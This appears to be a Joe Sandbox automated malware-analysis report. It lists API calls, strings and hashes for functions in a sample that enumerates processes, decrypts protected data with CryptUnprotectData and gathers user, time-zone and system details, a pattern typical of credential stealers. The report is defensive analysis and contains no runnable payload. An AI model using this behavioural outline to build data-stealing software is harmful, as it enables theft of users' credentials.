Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 4ce6c5960e953ca50323f0ea1acf36ade6e45c06422b9d08be3399a65e492270
Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
Opcode Fuzzy Hash: 4ce6c5960e953ca50323f0ea1acf36ade6e45c06422b9d08be3399a65e492270
Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9

Function 00419790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
CloseHandle.KERNEL32(00420ACE), ref: 0041980A

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61

Function 61EAD2AC Relevance: 6.6, Strings: 5, Instructions: 334COMMON

Download Yara Rule

Strings

kqa, xrefs: 61EAD645
RTRIM, xrefs: 61EAD507
NOCASE, xrefs: 61EAD4C8
main, xrefs: 61EAD638
BINARY, xrefs: 61EAD40C, 61EAD478, 61EAD4A0

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: strcmp
String ID: BINARY$NOCASE$RTRIM$kqa$main
API String ID: 1004003707-114998471
Opcode ID: 18f930d9ebde0cca1a2286de30ce105b028a00d416d2753ad386fb247e597bcb
Instruction ID: 60bcc8b0197c989f7013f8b1edc5a9d28cf944306873f66ca73508c1f88d5ce1
Opcode Fuzzy Hash: 18f930d9ebde0cca1a2286de30ce105b028a00d416d2753ad386fb247e597bcb
Instruction Fuzzy Hash: DEE149B4A087858BEB00DF68C59474ABBF1BF89308F24C86DEC989F395D779C8458B51

Function 00418810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
Process32First.KERNEL32(?,00000128), ref: 0041886E
Process32Next.KERNEL32(?,00000128), ref: 00418883

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

CloseHandle.KERNEL32(?), ref: 004188F1

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 1b96575a9a8ef5cfbd7df53b8feb98b6c73a13c60764a44f76fb77771f8b5c76
Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
Opcode Fuzzy Hash: 1b96575a9a8ef5cfbd7df53b8feb98b6c73a13c60764a44f76fb77771f8b5c76
Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5

Function 0040A2B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
memcpy.MSVCRT(?,?,?), ref: 0040A316
LocalFree.KERNEL32(?), ref: 0040A323

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61

Function 00417BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
wsprintfA.USER32 ref: 00417C47

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95

Function 004179E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1

Function 61E75F1F Relevance: 3.3, Strings: 2, Instructions: 815COMMON

Download Yara Rule

Strings

multiple recursive references: %s, xrefs: 61E76A4B
recursive reference in a subquery: %s, xrefs: 61E76A54

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: multiple recursive references: %s$recursive reference in a subquery: %s
API String ID: 0-3854365051
Opcode ID: 297298a0f659725ea1119cf4835fa01018d93a3eeff2d039f5330e37d216fd09
Instruction ID: 7d5e909c26c2478cc4d8a1152a5e5b16c7ea0641b558a5fde8b477d39de8e8ad
Opcode Fuzzy Hash: 297298a0f659725ea1119cf4835fa01018d93a3eeff2d039f5330e37d216fd09
Instruction Fuzzy Hash: 4E8207B4A052899FEB25CFA8C180B9DBBF1BF48308F24C559E859AB355D734E846CF50

Function 00418060 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00420E14), ref: 00418090
wsprintfA.USER32 ref: 004180A6

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
Instruction ID: 08512fc152d1616d0ad9ea22e4a9698bc695f8d0908738fe214e90ce4e812d63
Opcode Fuzzy Hash: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
Instruction Fuzzy Hash: 67F06DB1E04218ABCB10CB84EC45FEAFBBDFB48B14F50066AF51592280E7796904CAE5

Function 61E4B8A1 Relevance: 1.6, APIs: 1, Instructions: 323COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E4BBA6

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: c2002dce9f5e4d7c2b5f78abcb95225e97438571cbdf1746bfb7f61ccb496e17
Instruction ID: 0d30bdf3ca1535cc6e9debfec2a3fa3a34d16498aff86589297f71c0a5a37c1e
Opcode Fuzzy Hash: c2002dce9f5e4d7c2b5f78abcb95225e97438571cbdf1746bfb7f61ccb496e17
Instruction Fuzzy Hash: 7DC15D30E082858BEB15CFA8E4D079D7AF1AF8831CF29C46DD8469B349EB74D885CB51

Function 00407770 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00416414,?), ref: 00407784
RtlAllocateHeap.NTDLL(00000000,?,00416414,?), ref: 0040778B
lstrcatA.KERNEL32(?,0096C720,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 0040793B
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 0040794F
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407963
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407977
lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 0040798B
lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 0040799F
lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 004079B2
lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 004079C6
lstrcatA.KERNEL32(?,00969A90,?,00416414,?), ref: 004079DA
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 004079EE
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A02
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A16
lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407A29
lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407A3D
lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407A51
lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407A64
lstrcatA.KERNEL32(?,00969E38,?,00416414,?), ref: 00407A78
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A8C
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AA0
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AB4
lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407AC8
lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407ADB
lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407AEF
lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407B03
lstrcatA.KERNEL32(?,00969BC8,?,00416414,?), ref: 00407B16
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B2A
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B3E
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B52
lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407B66
lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407B7A
lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407B8D
lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407BA1
lstrcatA.KERNEL32(?,009696E8,?,00416414,?), ref: 00407BB5
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BC9
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BDD
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BF1
lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407C04
lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407C18
lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407C2C
lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407C3F
lstrcatA.KERNEL32(?,00969820,?,00416414,?), ref: 00407C53
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C67
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C7B
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C8F
lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407CA3
lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407CB6
lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407CCA
lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407CDE

Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00000000,00000000), ref: 004076A8
Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020, : ), ref: 004076BA
Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00000000,00000000,00000000), ref: 004076EF
Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00421934), ref: 00407700
Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00000000,00000000,00000000), ref: 00407733
Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00421938), ref: 0040774D
Part of subcall function 00407630: task.LIBCPMTD ref: 0040775B

lstrcatA.KERNEL32(?,0096C4E8,?,00000104), ref: 00407E6B
lstrcatA.KERNEL32(?,00974640), ref: 00407E7E
lstrlenA.KERNEL32(210DE020), ref: 00407E8B
lstrlenA.KERNEL32(210DE020), ref: 00407E9B

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 24a6ca59d8a0adc4477e6d15f78518d49f33a6da8cc5e85e890d4912c65980fb
Instruction ID: 0e0c3d68e69f6296a9396c1eab42491480c8bc0a3d7b858fcfddc2671413b035
Opcode Fuzzy Hash: 24a6ca59d8a0adc4477e6d15f78518d49f33a6da8cc5e85e890d4912c65980fb
Instruction Fuzzy Hash: E83264B6D04254ABCB14EB60DC95DDE733EAB48315F004A9EF209A2090EE79F789CF55

Function 004103B0 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

